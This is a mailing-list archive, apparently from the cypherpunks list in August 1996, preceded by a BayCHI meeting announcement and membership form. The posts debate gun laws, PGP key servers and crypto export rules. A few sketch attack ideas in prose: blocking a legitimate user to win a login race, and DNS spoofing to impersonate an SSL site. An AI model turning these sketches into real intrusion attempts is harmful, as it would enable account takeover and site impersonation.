SAM HECHT joined IDEO in 1994 after working in the areas of interior
design, 
architecture, industrial design, and graphic design.  He has worked in
the 
studios of David Chipperfield in London, Studia design group in Tel-Aviv, 
IDEO product development in San Francisco, and now currently as a senior 
industrial designer at IDEO in Tokyo.  In San Francisco, he created
designs 
for large corporations in the fields of furniture for Steelcase America, 
computer monitors for NEC Japan, and recently telephones for AT&T of
America.

After graduating from the Royal College of Art in London, he started to 
investigate the border between object and environment, which he exercised
in 
a number of interiors.  This interest was furthered with the designs of
the 
offices of IDEO in both San Francisco and Tokyo, which challenge our
thinking 
of the office environment - layered with the philosophy of
multi-disciplinary 
team working that IDEO employs.  He is also responsible for curating the
IDEO 
design explorations that occur each year.

In Tokyo, he is currently focusing on the design of objects of a smaller 
scale.  His work has won several awards; has been exhibited in Europe, 
America, and Asia; and has been published in leading journals throughout
the 
world.

************************************************************************
************************************************************************

                        NOTES OF SPONSORSHIP & THANKS

BayCHI thanks Jock MacKinlay and Stu Card of Xerox PARC for sponsoring
our use of the Xerox PARC auditorium for BayCHI monthly meetings.

************************************************************************

                  BayCHI's September meeting: September 10

                 location: Xerox PARC Auditorium, Palo Alto

************************************************************************

About BayCHI

BayCHI, the San Francisco Bay Area chapter of ACM's Special Interest
Group on Computer-Human Interaction, brings together systems designers,
human factors engineers, computer scientists, psychologists, social
scientists, users, software engineers, product managers, ... from
throughout the Bay Area to hear and to exchange ideas about
computer-human interaction and about the design and evaluation of user
interfaces.

To join BayCHI, which will get you added to the mailing list for the
newsletter, enable your access to the jobbank, enable your listing in
the consultants directory, get you a copy of the directory of BayCHI
members, ..., send a note to cstreeter.chi@xerox.com or to BayCHI,
PO Box 25, Menlo Park, CA 94026, and we will send you a printed
membership form.  Membership forms are also available at the BayCHI
meetings; plus, a membership form is appended to this announcement.

Additional information about BayCHI is available at BayCHI's evolving
World Wide Web site: http://www.baychi.org/.

For program updates and to leave messages, call 408-235-9244.

************************************************************************

                         BayCHI Steering Committee

The BayCHI steering committee meetings are open to anyone who is
interested in attending.  The meetings are generally held the first
Tuesday of the month at 7:30 p.m.  Please contact any member of the
committee for directions to the meeting.

Chair                  Bob Weissman        weissman.chi@xerox.com
Vice Chair             Clark Streeter      cstreeter.chi@xerox.com
Treasurer              Fred Jacobson       jacobson.chi@xerox.com

Program Chair          Richard Anderson    rianderson.chi@xerox.com
Membership Chair       Don Patterson       patterson.chi@xerox.com
Newsletter Editor      Fred Jacobson       jacobson.chi@xerox.com

Dinner Coordinator     Diane Cerra         dcerra@mkp.com
Webmistress            Christina Gibbs     cgibbs.chi@xerox.com
Job Bank               Mark Fernandes      mark_fernandes.chi@xerox.com

Publicity Chair        Christina Gibbs     cgibbs.chi@xerox.com
Tutorial Chair         David Rowley        rowley.chi@xerox.com
CHI Calendar           Megan Eskey         eskey.chi@xerox.com

Consultants Directory  Dave Salvator       salvator.chi@xerox.com
Strng Comm Mtg Host    Ulrike Creach       creach.chi@xerox.com
Newsletter Distr.      Joseph Jarosz       jarosz.chi@xerox.com

Volunteer Coordinator  Clark Streeter      cstreeter.chi@xerox.com
Elections Chair                  (open position)
SIGCHI Liaison         Don Patterson       patterson.chi@xerox.com

International Liaison  Susan Wolfe         wolfe.chi@xerox.com
BAHFES Liaison         Robert Kaplan       kaplan.chi@xerox.com
Xerox PARC host        Jock Mackinlay      mackinlay.chi@xerox.com
 
Past Chair ('95-'96)   David Rowley        rowley.chi@xerox.com
Past Chair ('93-'95)   Ellen Francik       francik.chi@xerox.com
Past Chair ('92-'93)   Richard Anderson    rianderson.chi@xerox.com

At-large               Allison Hansen      ahansen.chi@xerox.com
At-large               Howard Tamler       htamler.chi@xerox.com
At-large               Mike Van Riper      vanriper.chi@xerox.com


             BayCHI -- P.O. Box 25 -- Menlo Park, CA -- 94026
 
 
************************************************************************

                           DIRECTIONS TO XEROX PARC
 
>From Highway 280, take the Page Mill Road exit. Go east one mile to
Coyote Hill Road (no light) and turn right. Go 1/2 mile and PARC will
be on your left. Follow the signs to the auditorium.

>From 101, take the Oregon Expressway exit west 2 miles to El Camino
Real.  Oregon Expressway becomes Page Mill Road at El Camino Real.
Follow Page Mill Road 1.7 miles to Coyote Hill Road (no light) and turn
left.  Coyote Hill Road is just past the intersection with Foothill
Expressway. Go 1/2 mile and PARC will be on your left. Follow the signs
to the auditorium.

For a map, see http://www.parc.xerox.com/images/maptoparc.gif.

************************************************************************

                  O /                                \ O
        -----------X------------ Cut Here ------------X-----------
                  O \                                / O

BayCHI Membership Form                         (Version: 8 February 1996)
- ----------------------

Name: ________________________ ____________ _____________________________
      (First)                  (MI)         (Last)

Nickname (optional): _________________________
(for Membership Card/Badge name if other than above)

Preferred Email:_________________________________________________________

Secondary Email:_________________________________________________________

Web Address (URL):_______________________________________________________


Home Contact Information
     Address: ___________________________________________________________

              ____________________, _______  __________________  ________
              City                  State    Postal / City Code  Country

     Phone: (_____)____________________  FAX: (_____)___________________

Business Contact Information
     Company / Affiliation: _____________________________________________

                Department: _____________________________________________

     Address: ___________________________________________________________

              ____________________, _______  __________________  ________
              City                  State    Postal / City Code  Country

     Phone: (_____)____________________  FAX: (_____)___________________


Preferred Mailing Address (circle one):   Home      Business      Email
Only

Newsletter delivery via (circle one):     Email     Surface

Check if you DO NOT want to be included in the Membership Directory? ____

Check if you want to receive Job Bank postings: ____

Interests and Expertise (for Membership Directory listing - up to 90 char)




Circle if member of:     ACM      SIGCHI

ACM Member Number: _________________________________


Membership Fees:  $15.00 for New Members         $10.00 for Renewing
Members


Payment Enclosed :   $_______       Date:  __________

Payment by (circle one): Cash    Personal Check    Business Check    Other


Please mail this form, along with a check payable to BayCHI, to:
Don Patterson, 757 Avalon Way, Livermore, CA 94550
************************************************************************

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 9 Aug 1996 13:57:23 +0800
To: cypherpunks@toad.com
Subject: Imprisoned for Not Having a Gun?
Message-ID: <ae2f8d2303021004ed0d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:35 PM 8/8/96, talon57@well.com wrote:
>Jonathon <grafolog@netcom.com> wrote:
>
>>Said ordinance being passed, as a protest against Elk Grove, IL
>>passing an orinance, banning handguns.  Anybody know when Elk
>>Grove revoked their ordinance?  Crime went down for six months
>>there [ Elk Grove ] after the ban was passed, then it went up
>>far surpassing previous crime levels, for all types of crime.
>
>Pardon me Jonathon, but I believe you are confusing Morton Grove
>with Elk Grove. I do not have the statistics for the crime rates
>there, but several friends who have moved from there insist the
>crime rate has continued upwards as you mentioned. Also there are
>a couple of other interesting facts.

Regarding that town nearby that passed a _requirement_ that all households
have a gun:

"Ma'm, I'm Deputy Uptite, of the Dork's Grove Sheriff's Department. I'm
here to check on reports that you haven't obtained a gun, as required by
law. Could I come in and take a look around?"

"But I don't like guns, and I don't want one in my house."

"I'm sorry, ma'm, but it's the law. According to the People's
Self-Protection Act of 1997, you _must_ have  a gun. Now what I'm going to
do is give you a break. Think of this as a "fix-it ticket." Take this down
to my cousin's gun store, right off of Main and 10th, and he'll get you set
up with a Glock 23 or maybe a nice little Beretta. Shouldn't cost you more
than $400, and it'll save you a 6-month stretch at the work farm. Have a
nice day. Oh, and be sure to spend at least an hour at the week at the
range...that's part of the law, too."

---

Pro-gun fascism is just as bad a anti-gun fascism.

I do recall that the "you must have a gun" town had some exemptions for
folks opposed to guns, blah blah, but it still is intensely revolting to me
that any town could ever pass such a law. Much as I think being armed is
useful and all that, allowing such a law to go unchallenged feeds into the
same approach that tries to ban guns...if guns can be required, they can be
banned. What part of the Second Amendment did they not understand? (Legal
quibblers will perhaps say the Second applies to _Congress_ (as in
"Congress shall make no law"), and not to states and communities. I
disagree. Can a town restrict free speech just because it is not the
Congress?)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Fri, 9 Aug 1996 09:11:52 +0800
To: cypherpunks@toad.com
Subject: Freedom vs. US-Citizens
Message-ID: <199608081847.MAA13959@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


http://www.yahoo.com/headlines/960808/news/stories/crashpoll_1.html

Thursday August 8 1:14 PM EDT 

Terrorism Fears Prompt Support for Limits

LOS ANGELES (Reuter) - Most U.S. citizens are willing to give up some civil liberties in order to fight terrorism, according to a poll published Thursday. 

A nationwide survey conducted by the Los Angeles Times after the explosion of TWA Flight 800 and the bombing at Atlanta's Centennial Olympic Park also
showed that Americans favored economic sanctions over military action against countries involved in terrorism. 

It found that 65 percent of those surveyed were somewhat or very concerned that the fight against terrorism could bring restrictions on civil liberties but 58 percent
said they would be willing to give up some liberties to help curb terrorism. 

Government and aviation officials have indicated that increased security measures at airports around the country could mean more thorough and time-consuming
inspections of luggage, questioning of travelers and higher fares. 

Of those polled, 66 percent said they strongly favoured more secure airports, even at such costs, while 17 percent said they ``somewhat favoured'' such measures. 

Asked what action, in addition to trying those individuals responsible, the United States should take if the TWA crash is linked to another country, 40 percent
favoured economic sanctions against that nation, 14 percent opted for military action, 10 percent thought both should be used and 8 percent thought no action
should be taken apart from a trial. 

The telephone survey of 1,572 adults was conducted from Aug. 3 through Aug. 6 and had a margin of error of plus or minus three percentage points. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 9 Aug 1996 16:15:58 +0800
To: Alan <tcmay@got.net>
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <199608090451.VAA01180@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:25 AM 8/8/96 -0700, Alan wrote:
> It will be interesting to see the state come out on the side of all those
> anonymous drivers.

The state wants people to be anonymous from each other, but not anonymous
from the state.  This ensures that we are dependent on the state for the
maintenance of civilized behavior.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Fri, 9 Aug 1996 11:22:50 +0800
To: cypherpunks@toad.com
Subject: .mil links
Message-ID: <TCPSMTP.16.8.8.13.36.40.2780269260.1222868@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


Somebody e-mailed me a nice collection of military/intelligence sites. I'll forward it to the list in case anybody is interested. (Note: I haven't checked the links myself yet)

Harka

== Forwarded Message Follows =========================================

MILITARY SCIENCES AND DEFENSE SITES:

Advanced Information Technology
          Current research aimed at developing and implementing
          cutting edge hardware and software solutions for Navy
          problems. Also pointers to US Navy information, Washington
          DC Area Information and more.
http://www.ait.nrl.navy.mil:80/home.html

Advanced Research Projects Agency
          Provides selected information about the activities and
          programs of the Advanced Research Projects Agency(ARPA).
http://ftp.arpa.mil/

Air Intelligence Agency
          This World Wide Web home page is your gateway to information
          about the U.S. Air Force's Air Intelligence Agency, a Field
          Operating Agency headquartered at Kelly Air Force Base in
          San Antonio, Texas.
http://tecnet2.jcte.jcs.mil:8000/cybrspke/aialink.html

Armament Research Development and Engineering Center (ARDEC),
Picatinny Arsenal, NJ
          Access to staff directories, ARDEC information sources and
          remote non-technical information.
http://www.pica.army.mil/

Army Research Laboratory
          Allow scientist from government, academia, and industry to
          discover information about current Army research.
http://info.arl.army.mil/

Bosnia Link
          BosniaLINK, is the official Department of Defense
          information system about U.S. military activities in
          Operation JOINT ENDEAVOR, the NATO peace keeping mission in
          Bosnia.
http://www.dtic.dla.mil/bosnia/

Brooks Air Force Base, Human Systems Center
          Brooks AFB organizations, information by topic and local
          interest, publications, weather and keyword searches are
          available.
http://www.brooks.af.mil/

Central Intelligence Agency
          The Central Intelligence Agency (CIA) supports the
          President, the National Security Council, and all who make
          and execute US national security policy.
http://www.odci.gov/cia/

Defense Information Systems Agency Center for Standards
          Access to the DISA CFS Information Technology Standards
          Libary, Bulletin Board System and the Department of Defense
          Electronic Commerce/Electronic Data Interchange Standards
          Repository.
http://www.itsi.disa.mil/

Defense Information Systems Agency Server
          The Defense Information Systems Agency (DISA) mission is to
          Plan, Engineer, Develop, Test, Manage Programs, Acquire,
          Implement, Operate and Maintain Information Systems for C4I
          and Mission Support Under all conditions of Peace and War.
http://www.disa.mil/

Defense Intelligence Agency
          The Defense Intelligence Agency (DIA) is a Combat Support
          Agency and the senior military intelligence component of the
          U.S. Intelligence Community.
http://www.dia.mil/

Defense Logistics Service Center
          Provides logistics information products and services to all
          military and civilian government services and agencies.
          Server provides information on full range of DLSC products
          and services including LOGRUN, MEDALS, CAGE, FEDLOG, GIRDER,
          AMLS, Customer Service and FOI.
http://www.dlsc.dla.mil/

Defense Research and Engineering Network
          Information about the Defense Research and Engineering
          Network(DREN), the networking component of the DoD High
          Performance Computing Modernization Program.
http://www.arl.mil/HPCMP/DREN/index.html

Defense Technical Information Center
          Provides access to and transfer of scientific and technical
          information for DoD personnel, DoD contractors and other US
          government agencies.
http://www.dtic.mil/

DefenseLINK
          Access to DoD news releases, contract awards, briefing
          transcripts and related information. Postings are normally
          made within 20 minutes of official release. A search feature
          provides easy access to past releases.
http://www.dtic.mil/defenselink/

Hydromechanics Directorate, Naval Surface Warfare Center
          Navy lab responsible for the research, development, testing,
          and evaluation of ships, submarines and other marine
          technologies. Contains information on facilities, projects
          and technical reports.
http://www50.dt.navy.mil/

Intelligence Community Homepage
          The Intelligence Community is a group of 13 government
          agencies and organizations that carry out the intelligence
          activities of the United States government.
http://www.odci.gov/ic/

National Defense University
          Information on professional military education. NDU is home
          to several colleges and institutions dedicated to military
          education, research, executive skills training, public
          policy information resource management, and more. Also
          contains a library.
http://www.ndu.edu/

National Security Agency
          The National Security Agency (NSA) is responsible for the
          centralized coordination, direction, and performance of
          highly specialized technical functions in support of U.S.
          Government activities to protect U.S. information systems
          and produce foreign intelligence information.
http://www.nsa.gov:8080/

Naval Command, Control and Ocean Surveillance Center (NCCOSC)
          Information about the three subordinate commands of NCCOSC
          as well as pointers to other naval resources.
http://www.nosc.mil/

Naval Surface Warfare Center, Carderock Division
          Contains information pertaining to CALS in the Navy. All
          certified Navy DTDs and FOSIs are available on the
          Repository for downloading.
http://navysgml.dt.navy.mil/

NavyOnLine
          Gateway to the Department of Navy online resources. Access
          to the Navy News Service, Naval Postgraduate School, Navy
          Public Affairs Library, Naval Research Laboratory, Space and
          Naval Warfare Systems Command and more.
http://www.navy.mil/

Office of the Director of Information Systems for Command, Control,
Communications and Computers (ODISC4)
          Provides up to date information on the ODSIC4 and the Army's
          Information Mission Area.
http://www.army.mil/disc4-pg/disc4.htm

Office of Naval Research
          The Office of Naval Research (ONR) coordinates, executes,
          and promotes the science and technology programs of the
          United States Navy and Marine Corps through universities,
          government laboratories, and nonprofit organizations.
http://www.onr.navy.mil/

Office of Strategic Phenomena
          The mission of the Office of Strategic Phenomena is to
          develop and maintain the means by which certain
          phenomenology data is to be archived, distributed, analyzed
          and used by the community of designers, experimenters,
          scientists, and wargamers working in the areas such as
          ballistic missile defense or in synthetic environments for
          more comprehensive DoD simulations.
http://vader.nrl.navy.mil/osp.html

The Pentagon
          Access the headquarters of the Department of Defense and get
          general information and tour schedules for the Pentagon.
http://www.dtic.mil/defenselink/pubs/pentagon/index.html

Persian Gulf War Illness Home Page
          Visit GulfLINK, the information system of the Persian Gulf
          War Veterans Illnesses Task Force. This service provides to
          the public information concerning the illnesses affecting
          Persian Gulf War veterans.
http://www.dtic.dla.mil/gulflink/

Space & Naval Warfare Systems Command
          Information about the resources at the Space and Naval
          Warfare Systems Command.
http://www.spawar.navy.mil/

U.S. Air Force
          The official web site of the U.S. Air Force. Contains news,
          fact sheets and photos of weapon systems, biographies and
          key leaders, the latest publications about the Air Force,
          and photos for current operations around the world. The site
          also lists more than 40 Air Force web sites around the
          world.
http://www.dtic.mil/airforcelink/

U.S. Army Center of Military History
          The U.S. Army Center of Military History provides
          information on past Wars and Army history in general.
http://www.army.mil/cmh-pg/default.htm

U.S. Army Homepage
          The Army Homepage is a central index for all U.S. Army Web
          sites. It is updated daily and has both Organizational and
          Subject lists. If you need to find a U.S. Army Homepage, you
          will find it here!
http://www.army.mil/

U.S. Marines Corp Homepage
          The official World Wide Web information service of the
          United States Marine Corps.
http://www.usmc.mil/

___ Blue Wave/386 v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@acm.org>
Date: Fri, 9 Aug 1996 06:13:40 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <2.2.32.19960808174142.006cb648@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


This appeared on AP today:
-------
PORTLAND, Ore. (AP) - A computer consultant who put a
      state list of motor vehicle records on the Internet
      suspended access to the site today after he was
      bombarded by complaints the service invaded people's
      privacy. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Thu, 8 Aug 1996 22:34:09 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: F2 hash?
In-Reply-To: <199608081150.GAA18566@homeport.org>
Message-ID: <Pine.GSO.3.93.960808141621.22194A-100000@nebula.online.ee>
MIME-Version: 1.0
Content-Type: text/plain


 Thu, 8 Aug 1996, Adam Shostack wrote:

> This doesn't work as of version 1.3(?) and later.  There is a time
> delay before the 'ok' message is sent by the server.  If it gets two
> correct login attempts in the delay period (1-5 seconds, default 2),
> it assumes an attack is underway and rejects them both.

Yes but what if you are able to block the correct user and only the bad
boy gets a chance to log in? Shouldn't be so hard thing to do.

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Fri, 9 Aug 1996 11:18:57 +0800
To: Amnesia Anonymous Remailer <amnesia@chardos.connix.com>
Subject: Re: PGP public key servers are NOT useful!
Message-ID: <199608082044.PAA00861@betty.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain



> What I want to prevent is some person I dislike uploading his
> signature on my key

Yes, that's unpreventable.  It still does not change the fact that it 
is up to the person using your public key to determine if you are 
indeed that actual owner of that key.
 
> How would you like it if I added a new ID to your key containing sort
> of insult, certified that ID, and uploaded the new signature to the
> key servers.

RTFM.  Look, go into PGP and try to change your key ID.  You will 
note that PGP asks you to provide the passphrase to your secret key 
before allowing an id change.  Someone could not get your public key 
off of a keyserver and change the id of the key.  The need both your 
secret key and your passphrase to do that.

Now someone could create a key-pair themselves and  falsely assign 
your e-mail address and some miscellaneous crap as the ID.  They 
could then upload the"rogue" public key portion of this keypair to 
the servers.

However, the falsity of this "rogue" public key can be easily 
determined by you and anyone who is trying to communicate securely 
with you.  All of this is explained with great clarity in the PGP 
documentation.

Think about this...
Suppose I knew who you were and knew your e-mail address.  What's to 
stop me from creating a "rogue" key-pair with your address as the 
e-mail id and uploading it to the keyservers?  Just because you don't 
utilize the keyservers, doesn't mean your public key can't be placed 
there.  "Controlling" the distribution of your public key is giving 
you a false sense of security where none is really needed.

Ponder: why is a public key called a "public" key?

"Controlling" the distribution of you public key is a pointless 
exercise.  Controlling authentication is what you and those who 
communicate securely with you whould be concerned about.

me
--------------------------------------------------------------
 Omegaman <omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
Send a message with the text "get key" in the 
"Subject:" field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Fri, 9 Aug 1996 14:08:01 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: An SSL implementation weakness?
In-Reply-To: <83952437618205@cs26.cs.auckland.ac.nz>
Message-ID: <Pine.BSI.3.93.960808145842.6124A-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 9 Aug 1996 pgut001@cs.auckland.ac.nz wrote:

> The following weakness seems very obvious, I've got a partial writeup of this 
> but before I turn it into a paper or something and arrange a demonstration of 
> how it would work I thought I'd check to make sure (a) someone else hasn't 
> mentioned it before, and (b) it is actually possible (it seems too simple to 
> be true):
>  
> 1. Using DNS spoofing, stage a hostile takeover of an address (for example 
>    using bogus referrals set yourself up as the delegated server for a DNS 
>    subtree).
> 2. Get a Verisign certificate for an arbitrary company and set up a bogus site 
>    at the stolen address.
>  
> Lets say you steal www.megafoobarcorp.com.  People connect to this site (which 
> is actually your bogus site), Netscape (for example) displays the blue line 
> and non-broken key (which is actually for your J.Random certificate rather 
> than the real megafoobarcorp one) to show the connection is secure, and you've 
> just subverted their site.  

The domain in the server's certificate will not match the domain on the url,
i.e. the certificate will say www.eve.com and the url will be
www.megafoobarcorp.com.  Netscape does and should complain about this,
and that particular warning cannot be turned off.  Now it is quite possible
that the user will ignore the warning or not fully understand it, and 
proceed, but if the user pays attention to those sort of warnings, the
switch will be detected.

Now maybe if you got a certificate for a very similar domain name, the user
might be more likely to ignore the warning.


- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgpmWy/fy+vkqMxNAQEZfQP8C69iVqCdXBudh8N2UIlLVew65Yi8lkad
Wjnsur/vsFbsGQZBOvh5IBshJkLBYPZPL2Q92Zi14Xcir8/Ld18N8kFShQ97id5l
npXMcY7ncFnfeohdwhIJdDgzaNYK9i/eVeb90JVPh/cV89xw9BnXv4h/7xW3ul+j
xp/m1oyRZ/w=
=Tsus
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Warrior <warrior@tateonline.com>
Date: Fri, 9 Aug 1996 08:34:52 +0800
To: cypherpunks@toad.com
Subject: AOL crashes and burns
Message-ID: <199608082016.PAA26169@ford.socomm.net>
MIME-Version: 1.0
Content-Type: text/plain


Great news, eh?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 9 Aug 1996 15:14:50 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Imprisoned for Not Having a Gun?
In-Reply-To: <ae2f8d2303021004ed0d@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960808151142.29184B-100000@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 8 Aug 1996, Timothy C. May wrote:

> Regarding that town nearby that passed a _requirement_ that all
> households have a gun:
> ...
> Pro-gun fascism is just as bad a anti-gun fascism.
> 
> I do recall that the "you must have a gun" town had some
> exemptions for folks opposed to guns, blah blah, but it still
> is intensely revolting to me that any town could ever pass
> such a law...

I can't find the exact quote, but Will Rogers quipped that every
time Congress made a law, it was a joke.  And every time Congress
made a joke it was a law.  The town near Morton Grove was not
making a real requirement that every household have a gun, they
were just making a joke at Morton Grove's expense.  In addition
to the "exceptions," there was no penalty for violation of the
law, thus making sure it was unenforceable.  It was not a case
of "pro-gun fascism" but of rough American political humor.  At
the very least it kept the city council out of more serious 
mischief.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 9 Aug 1996 13:59:32 +0800
To: Free Speech <freespeech@mail.multiverse.com>
Subject: Suit filed to enjoin crypto provisions of the ITAR
Message-ID: <199608081921.PAA30963@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



[I have cross-posted this press release by my lawyers to several
mailing-lists. I am subscribed to all of them and I believe that this
information is relevant to all of them, but I apologize because you
may receive several copies.]

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
		     URL:  http://samsara.law.cwru.edu


------------------------Press Release---------------------------------

Law Professor Sues Federal Government
Over Computer Privacy Issues

Federal Civil Rights Action Seeks Injunction Against 
State Department And National Security Agency

Cleveland Scholar Attacks Prohibition On Discussing 
Cryptographic Software With Foreign Students And Colleagues


For Immediate Release
Cleveland, Wednesday, August 7, 1996

For More Information Contact:
Raymond Vasvari  (216) 522-1925
Gino Scarselli  (216) 291-8601

More Information Will Be Available at:
URL: //http:/samsara.law.cwru.edu


     A Case Western Reserve University law professor filed suit today in
     federal court, challenging government regulations which restrict
     his ability to teach a course in computer law.  Peter Junger, a
     twenty-five year veteran of the law school faculty, will file a
     federal civil rights action this afternoon in the United States
     District Court in Cleveland.  The suit names the Department of
     State and the secretive National Security Agency, which administer
     federal regulations limiting Professor Junger's ability to teach.

     The case involves the International Traffic in Arms Regulations, or
     ITAR, federal regulations which restrict the export of military
     technology.  Under the ITAR, cryptographic computer software, which
     encodes text to preserve the privacy of messages on the Internet,
     is considered a "munition" and subject to strict export control.
     The regulations raise significant First Amendment questions by
     defining "export" to include discussing technical information about
     non-classified software with foreign nationals, such as students
     registered for Professor Junger's course.

     In recent months, the State Department has sent a series of letters
     threatening possible criminal action to a Florida man who posted a
     simple cryptographic algorithm to the "sci.crypt" Usenet Newsgroup,
     an Internet site popular with cryptography enthusiasts.  These and
     similar incidents have caused Professor Junger to limit his
     discussions of cryptographic material with foreign colleagues, for
     fear of violating the ITAR.  Penalties for unlicenced disclosure of
     cryptographic information are severe: federal law provides ten year
     prison terms and One Million Dollar fines for those convicted of
     violating the Arms Export Control Act, the legislation under which
     the ITAR was promulgated.

     Professor Junger, whose class at Case Western Reserve focuses on
     the legal aspects of computer use and software development, plans
     to turn away any foreign students who register for the course this
     fall, largely because the law is uncertain as to what he may teach,
     and to whom.

     The restrictions at issue are administered by the Department of
     State, in cooperation with the ultra-secret National Security
     Agency, the organization charged with eavesdropping on foreign
     governments.   Under the ITAR, Junger may not teach foreign
     students about even simple software capable of encoding messages.
     Such software is vital to maintaining the privacy of communications
     and financial transactions on the Internet, and Junger believes
     that lawyers need to understand how it works in order to prepare to
     practice in an increasingly technological world.

     The information that Junger wishes to disclose is widely available
     on the Internet and elsewhere.  "It's not as though we are talking
     about classified information,"  explained Gino Scarselli, one of
     three lawyers representing Junger in the case.  "The material at
     issue in this case can be found in any university library,  but the
     regulations make no exceptions for even the most basic software,"
     Scarselli noted.   The lawsuit does not challenge the government's
     right to restrict access to classified information.

     Junger is also represented by Raymond Vasvari and Kevin Francis
     O'Neill, two Cleveland attorneys with considerable experience in
     First Amendment issues.   As Vasvari explained, the suit presents
     important First Amendment questions about the government's ability
     to regulate academic life.  "These regulations allow the government
     to dictate what a professor may and may not teach, even though the
     material involved poses no threat to national security," Vasvari
     explained.

     The suit charges that by requiring Junger to apply for a federal
     license to discuss cryptography with foreigners, the government is
     violating a well-established First Amendment rule which prohibits
     the government from imposing prior restraints on expression without
     clear, narrowly drawn standards distinguishing prohibited
     expression from permissible speech.  The United States Supreme
     Court has consistently held that such prior restraints face a heavy
     burden in court, and that standardless licencing schemes allowing
     officials broad discretion in restriction speech are
     unconstitutional.

     Because computer cryptography is expected to play an important role
     in the economic development of the Internet, the case is being
     closely watched.  Scarselli has worked closely with attorneys
     affiliated with the San Francisco based Electronic Frontier
     Foundation in preparing the suit, and Junger and his lawyers have
     been in frequent contact with John Gilmore, formerly of Sun
     Microsystems, who has offered his assistance as a technical advisor
     in the case.  

     At issue is not only Junger's right to discuss cryptography with
     foreigners, but also his and other's right to publish and
     distribute such information both in traditional forms and on the
     internet.

     Professor Junger's suit seeks declaratory and injunctive relief,
     prohibiting the government from interfering with his, or any other
     person's, discussing non-classified cryptographic information with
     foreign persons or from publishing that information.  Lawyers for
     Junger have moved the court for a preliminary injunction.  Junger's
     course begins in the fall semester, later this month.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Fri, 9 Aug 1996 12:24:16 +0800
To: "John F. Fricker" <jfricker@vertexgroup.com>
Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <2.2.32.19960808154452.00c70514@vertexgroup.com>
Message-ID: <Pine.GUL.3.95.960808151724.6575A-100000@Networking.Stanford.EDU>
